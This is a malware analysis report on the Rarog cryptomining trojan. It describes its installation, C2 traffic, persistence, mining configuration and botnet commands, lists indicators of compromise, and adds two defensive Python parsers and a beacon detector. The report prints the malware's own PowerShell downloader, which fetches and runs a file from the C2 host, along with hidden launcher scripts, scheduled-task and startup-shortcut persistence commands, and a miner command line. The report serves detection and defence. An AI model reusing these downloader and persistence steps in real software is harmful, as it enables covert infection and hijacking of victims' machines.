Technical Malware Analysis
[Source: jiwo.org]
The file with the following properties was used to conduct this analysis:
MD5: 15361551cb2f705f80e95cea6a2a7c04
SHA1: a388e464edeb8230adc955ed6a78540ed1433078
SHA256: 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a
Compile Time: 2018-03-17 16:36:18 UTC
PDB String: D:\Work\_Rarog\Release\Rarog.pdb
When Rarog is initially executed, the malware will look for the existence of the following file:
- C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
In the event this file is missing on the system, Rarog will enter its installation routine, which is outlined below.
Installation Routine
The installation routine begins by creating the following hidden directory path:
- C:\ProgramData\MicrosoftCorporation\Windows\System32\
It then copies itself to the directory above with the filename ‘Isass.exe’. This newly copied file is then executed in a new process. After this takes place, the malware makes an HTTP POST request as follows:
    POST /2.0/method/checkConnection HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 0
    Host: api.polotreck[.]xyz

    HTTP/1.1 200 OK
    Server: nginx/1.13.9
    Date: Tue, 20 Mar 2018 16:34:10 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 12
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1

    c3VjY2Vzcw==
The response to the above request is simply base64-encoded and decodes to ‘success’. The response is checked, and if ‘success’ is received, the malware proceeds.
The malware makes the following request to determine if the C2 wishes the malware to spawn a fake error message box:
    POST /2.0/method/error HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 9
    Host: api.polotreck[.]xyz

    profile=1

    HTTP/1.1 200 OK
    Server: nginx/1.13.9
    Date: Tue, 20 Mar 2018 16:43:58 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 192
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1
    Vary: Accept-Encoding

    MTsxO1N5c3RlbSBFcnJvcjtUaGUgcHJvZ3JhbSBjYW4ndCBzdGFydCBiZWNhdXNlIE1TVkNQMTEwLmRsbCBpcyBtaXNzaW5nIGZyb20geW91ciBjb21wdXRlci4gVHJ5IHJlaW5zdGFsbGluZyB0aGUgcHJvZ3JhbSB0byBmaXggdGhpcyBwcm9ibGVtLg==
The base64 response above decodes to the following:
“1;1;System Error;The program can’t start because MSVCP110.dll is missing from your computer. Try reinstalling the program to fix this problem.”
The response is split by ‘;’. The first parameter is hardcoded, while the second is used to specify the type of message box to display. The following options are provided:
Parameter | MessageBox Option
0 | No error message displayed.
1 | A stop-sign icon appears in the message box.
2 | A question-mark icon appears in the message box.
3 | An exclamation-point icon appears in the message box.
4 | An icon consisting of a lowercase letter i in a circle appears in the message box.
The third parameter specifies the title of the message box, while the last parameter represents the message. Using the example previously, we are presented with the following message:
Figure 9: Fake error message box displayed by Rarog
Finally, Rarog executes the following command, which kills the current malware instance and deletes it from disk:

    cmd.exe /c taskkill /im 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe /f & erase C:\Users\Administrato\Desktop\73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe & exit
Post-Installation Routine
After the installation routine completes and a new instance of Isass.exe is spawned, this new instance of Rarog will check for the existence of the following file:
- C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\driver.dat
If this file does not exist, Rarog will create the necessary hidden directory structure, and make a series of HTTP POST requests. The first request will be to ‘/2.0/method/checkConnection’ to ensure the remote C2 server is alive. The second request is to the following:
    POST /4.0/method/installSuccess HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 9
    Host: api.polotreck[.]xyz

    buildID=5.1&hwid={1efdb526-2d21-11e8-a30c-8c8590105ceb}&profile=1&os=Microsoft Windows 7 Ultimate &platform=x86&processor=Intel(R) Core(TM) i7-7700HQ CPU @ 2.80 GHz&videocard=VMware SVGA 3D

    HTTP/1.1 200 OK
    Server: nginx/1.13.9
    Date: Tue, 20 Mar 2018 16:43:58 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 192
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1

    250
The response provided by the C2 server is the stored identifier of the victim within the C2 database. This number is stored in the ‘driver.dat’ file.
The following registry key is created to ensure Rarog persists across reboots:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows_Antimalware_Host_Syst - C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
The following hidden directory is created, and the following three files are written to this location:
C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
C:\ProgramData\WindowsAppCertification\cert.cmd
C:\ProgramData\WindowsAppCertification\checker.vbs
The contents of WindowHelperStorageHostSystemThread.ps1 is as follows:
    $path = 'C:\ProgramData\MicrosoftCorporation\Windows\System32\'
    $fpath = $path + 'Isass.exe'
    $furl = 'http://api.polotreck[.]xyz/2.0/method/update'
    $isfile = Test-Path $fpath
    if($isfile -eq 'True') {}
    else{
    New-Item -ItemType directory -Path $path
    $WebClient = New-Object System.Net.WebClient
    $WebClient.DownloadFile($furl,$fpath)
    Start-Process -FilePath $fpath}
The contents of cert.cmd is as follows:
    @echo off
    powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
The contents of checker.vbs is as follows:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run "C:\ProgramData\WindowsAppCertification\cert.cmd",0
The following command is executed to create a Scheduled Task to run the checker.vbs script periodically:
    schtasks.exe /Create /SC MINUTE /MO 30 /TN "Windows_Antimalware_Host" /TR "C:\ProgramData\WindowsAppCertification\checker.vbs" /F
The following command is executed to create a Scheduled Task to run Isass.exe periodically:
    schtasks.exe /Create /SC MINUTE /MO 5 /TN "Windows_Antimalware_Host_Systm" /TR "C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe" /F
Additionally, the following command is executed to generate a shortcut link in the victim’s startup folder:
    cmd.exe /c echo Set oWS = WScript.CreateObject("WScript.Shell") > CreateShortcut.vbs & echo sLinkFile = "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Isass.lnk" >> CreateShortcut.vbs & echo Set oLink = oWS.CreateShortcut(sLinkFile) >> CreateShortcut.vbs & echo oLink.TargetPath = "C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe" >> CreateShortcut.vbs & echo oLink.Save >> CreateShortcut.vbs & cscript CreateShortcut.vbs & del CreateShortcut.vbs
These registry modifications, file modifications, and executed commands provide multiple ways for Rarog to persist on the system, both across reboots and in cases where the malware dies or is forcibly closed.
Rarog then makes the following POST request to ensure the ID exists on the remote C2 server:
    POST /4.0/method/check HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 6
    Host: api.polotreck[.]xyz

    id=250

    HTTP/1.1 200 OK
    Server: nginx/1.13.10
    Date: Tue, 20 Mar 2018 20:47:52 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 12
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1

    c3VjY2Vzcw==
Again, Rarog looks for a response of ‘success’. Rarog continues to make the following POST request:
    POST /4.0/method/threads HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 0
    Host: api.polotreck[.]xyz

    HTTP/1.1 200 OK
    Server: nginx/1.13.10
    Date: Tue, 20 Mar 2018 20:49:46 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 16
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1

    MjsxOzE7MTsyOw==
The decoded response by the C2 server is ‘2;1;1;1;2;’. This data is split via ‘;’ and the values are used to indicate whether certain Rarog features are enabled or not. The value of ‘1’ represents ‘On’, while anything else represents ‘Off’.
Position | Name | Description
0 | USB Devices | Searches the machine for removable drives. Copies Rarog to the removable drive with the name of ‘autorun.exe’. Also creates an ‘autorun.inf’ file in the same directory, which will execute ‘autorun.exe’ when loaded.
1 | Helpers | Creates the hidden ‘C:\ProgramData\MicrosoftCorporation\Windows\Helpers\’ directory, and copies Isass.exe to ‘SecurityHeaIthService.exe’, ‘SystemldleProcess.exe’, and ‘winIogon.exe’ in this directory.
2 | Mining Status | Makes a POST request to ‘/2.0/method/get’ to retrieve a URL for a mining executable. This file is stored in the ‘C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\’ directory.
3 | Miners Killer | Makes a POST request to ‘/4.0/method/modules’. This provides a list of DLLs that are placed in the ‘C:\ProgramData\MicrosoftCorporation\Windows\Modules\’ folder. These DLLs are then loaded by Rarog. The DLLs in question are expected to have an export function named ‘Instance’.
4 | Task Manager | This does not appear to be used by the malware.
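The two ‘;’-delimited responses above (the ‘/2.0/method/error’ message-box fields and the ‘/4.0/method/threads’ feature flags) are small enough to decode by hand, but an analyst triaging captures wants a parser. The following is an added example, not code from the original analysis; it decodes the base64 bodies copied from the captures on this page and maps the fields using the two tables above.

```python
import base64

# Second ';' field of the /2.0/method/error reply, per the message-box table above.
ICON_TYPES = {
    "0": "no message box",
    "1": "stop-sign icon",
    "2": "question-mark icon",
    "3": "exclamation-point icon",
    "4": "information (lowercase i) icon",
}
# Flag positions in the /4.0/method/threads reply, per the feature table above.
THREAD_FEATURES = ["USB Devices", "Helpers", "Mining Status", "Miners Killer", "Task Manager"]


def decode_c2_response(body):
    """C2 bodies are base64 text; strict decoding rejects non-base64 bodies early."""
    return base64.b64decode(body, validate=True).decode("utf-8")


def parse_error_response(body):
    """Split 'hardcoded;icon;title;message' (the message itself may contain ';')."""
    fields = decode_c2_response(body).split(";", 3)
    if len(fields) != 4:
        raise ValueError("expected four ';'-separated fields")
    hardcoded, icon, title, message = fields
    return {"hardcoded": hardcoded, "icon": ICON_TYPES.get(icon, "unknown: " + icon),
            "title": title, "message": message}


def parse_threads_response(body):
    """Map each positional flag to its feature; '1' is on, anything else is off."""
    flags = decode_c2_response(body).rstrip(";").split(";")
    return {name: flag == "1" for name, flag in zip(THREAD_FEATURES, flags)}


# Bodies copied verbatim from the captures on this page.
SAMPLE_ERROR = "MTsxO1N5c3RlbSBFcnJvcjtUaGUgcHJvZ3JhbSBjYW4ndCBzdGFydCBiZWNhdXNlIE1TVkNQMTEwLmRsbCBpcyBtaXNzaW5nIGZyb20geW91ciBjb21wdXRlci4gVHJ5IHJlaW5zdGFsbGluZyB0aGUgcHJvZ3JhbSB0byBmaXggdGhpcyBwcm9ibGVtLg=="
SAMPLE_THREADS = "MjsxOzE7MTsyOw=="

if __name__ == "__main__":
    print(parse_error_response(SAMPLE_ERROR))
    print(parse_threads_response(SAMPLE_THREADS))
```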
When the ‘Mining Status’ option is enabled, and a miner is successfully downloaded from a remote server, Rarog will make the following request to the C2 server:
    POST /2.0/method/config HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 6
    Host: api.polotreck[.]xyz

    id=250

    HTTP/1.1 200 OK
    Server: nginx/1.13.10
    Date: Wed, 21 Mar 2018 16:55:38 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 108
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1
    Vary: Accept-Encoding

    LW8geG1yLnBvb2wubWluZXJnYXRlLmNvbTo0NTU2MCAtdSBtb3JlMnNldEBwcm90b25tYWlsLmNvbSAtcCB4IC1rIC10IHtUSFJFQURTfQ==
The response decodes to the following:
    -o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t {THREADS}
These parameters will be supplied to the mining program upon execution. Prior to running the miner, Rarog will check the running processes on the system for the following strings. Should they be encountered, the processes will be killed, and the executable will be deleted from the system.
- minergate
- stratum
- cryptonight
- monerohash
- nicehash
- dwarfpool
- suprnova
- nanopool
- xmrpool
These are strings commonly associated with the mining pools used when mining various cryptocurrencies.
Rarog then makes the following request to determine what percentage of the victim’s CPU to use for mining:
    POST /4.0/method/cores HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 6
    Host: api.polotreck[.]xyz

    id=250

    HTTP/1.1 200 OK
    Server: nginx/1.13.10
    Date: Wed, 21 Mar 2018 17:03:18 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1

    NTA=
The response decodes to a value of ‘50’. Rarog then makes a request to ‘/4.0/method/blacklist’ to determine which processes should be blacklisted. The server in question did not have a configured blacklist, but an example of what may be returned is shown below:

    dota2.exe;csgo.exe;WorldOfTanks.exe;TslGame.exe;gta5.exe;photoshop.exe;vegas_pro.exe;premier.exe;Prey.exe;Overwatch.exe;MK10.exe;Minecraft.exe;DiabloIII.exe;QuakeChampions.exe;Acrobat.exe;Acrord32.exe
This list represents common resource-intensive applications, such as games, that Rarog will continually monitor for. In the event such a program is running in the foreground, Rarog will suspend mining operations.
The malware then makes the following request to retrieve the amount of time that Rarog will sleep before mining on the target victim:
    POST /2.0/method/delay HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 6
    Host: api.polotreck[.]xyz

    id=250

    HTTP/1.1 200 OK
    Server: nginx/1.13.10
    Date: Wed, 21 Mar 2018 17:11:05 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 5
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1

    10000
Prior to continuing, Rarog will check the running processes on the system for the following common security applications, and will not proceed if found:
- NetMonitor
- Taskmgr.exe
- Process Killer
- KillProcess
- System Explorer
- AnVir
- Process Hacker
Rarog takes the previously collected CPU usage percentage and applies it to the number of CPUs found on the system. For example, if a system had four CPU cores and the setting was 50%, Rarog could configure the miner to use 2 threads (0.5 x 4). The following mining command is executed by Rarog:

    C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\xmrig32.exe -o xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t 1
Botnet Functionality
Rarog will periodically make HTTP POST requests to the following:
    POST /2.0/method/setOnline HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
    Content-Length: 16
    Host: api.polotreck[.]xyz

    id=250&build=5.1

    HTTP/1.1 200 OK
    Server: nginx/1.13.10
    Date: Wed, 21 Mar 2018 17:28:27 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    Connection: keep-alive
    X-Powered-By: PHP/5.6.30-0+deb8u1
This particular URI can also hand Rarog additional tasks to perform. The following commands are supported:
Command | Description
install | Download and execute specified file
open_url | Open the specified URL in browser
ddos | Perform DDoS operations against specified target
update | Update Rarog Trojan from specified URL
restart_bot | Restart Rarog Trojan
delete_bot | Delete Rarog Trojan
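Every capture on this page shares two network fingerprints: the hardcoded ‘Rarog/5.0’ token appended to a stock Mozilla User-Agent, and POST requests to ‘/<version>/method/<name>’ paths. The following is an added example, not part of the original analysis, that scans proxy log lines for those fingerprints; the log format (source IP, method, host, path, quoted User-Agent) and the sample lines are constructed for the example.

```python
import re
from collections import Counter

# C2 method paths collected from the captures on this page.
RAROG_METHODS = {
    "/2.0/method/checkConnection", "/2.0/method/error", "/2.0/method/config",
    "/2.0/method/delay", "/2.0/method/setOnline", "/2.0/method/get",
    "/2.0/method/update", "/4.0/method/installSuccess", "/4.0/method/check",
    "/4.0/method/threads", "/4.0/method/cores", "/4.0/method/blacklist",
    "/4.0/method/modules",
}
# Every capture carries a stock Mozilla prefix followed by a "Rarog/<version>" token.
UA_RE = re.compile(r"\bRarog/\d+(?:\.\d+)?\b")
# Shape shared by all method paths, to catch versions or methods not listed above.
PATH_RE = re.compile(r"^/\d+\.\d+/method/\w+$")
# Constructed proxy log format (assumption): src_ip method host path "user-agent"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def classify_line(line):
    """Return (src_ip, reason) if the line looks like a Rarog beacon, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    src, method, _host, path, ua = m.groups()
    if UA_RE.search(ua):
        return src, "user-agent"          # strongest signal: the hardcoded UA token
    if method == "POST" and path in RAROG_METHODS:
        return src, "known-method-path"   # UA changed, path still matches a capture
    if method == "POST" and PATH_RE.match(path):
        return src, "method-path-shape"   # weaker: /<ver>/method/<name> POST pattern
    return None


def scan(lines):
    """Count beacon hits per (source host, reason)."""
    hits = Counter()
    for line in lines:
        hit = classify_line(line)
        if hit:
            hits[hit] += 1
    return hits


# Constructed sample log: three Rarog beacons, one benign request, one look-alike.
SAMPLE_LOG = """\
10.0.0.5 POST api.polotreck[.]xyz /2.0/method/checkConnection "Mozilla/5.0 (Windows NT 6.1) Rarog/5.0"
10.0.0.5 POST api.polotreck[.]xyz /4.0/method/installSuccess "Mozilla/5.0 (Windows NT 6.1) Rarog/5.0"
10.0.0.5 POST api.polotreck[.]xyz /2.0/method/setOnline "Mozilla/5.0 (Windows NT 6.1) Rarog/5.0"
10.0.0.9 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 10.0) Firefox/58.0"
10.0.0.7 POST api.example.net /3.0/method/setOnline "Mozilla/5.0 (Windows NT 6.1)"
""".splitlines()
```

Running `scan(SAMPLE_LOG)` attributes three user-agent hits to 10.0.0.5 and one weaker path-shape hit to 10.0.0.7; the path-shape rule is there because the method names and API version are server-side strings that a new build can change while the request pattern stays the same.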
SHA256 Hashes
For a full list of SHA256 hashes and their first encountered timestamp, please refer to the following file.
C2 Servers
For a full list of C2 servers and their first encountered timestamp, please refer to the following file.
File and Folder Artifacts
C:\ProgramData\MicrosoftCorporation\Windows\System32\
C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
C:\ProgramData\MicrosoftCorporation\Windows\System32\_Isass.exe
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\driver.dat
C:\ProgramData\WindowsAppCertification\
C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
C:\ProgramData\WindowsAppCertification\cert.cmd
C:\ProgramData\WindowsAppCertification\checker.vbs
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SecurityHeaIthService.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SystemldleProcess.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\winIogon.exe
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\
C:\ProgramData\MicrosoftCorporation\Windows\Modules
Registry Artifacts
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows_Antimalware_Host_Syst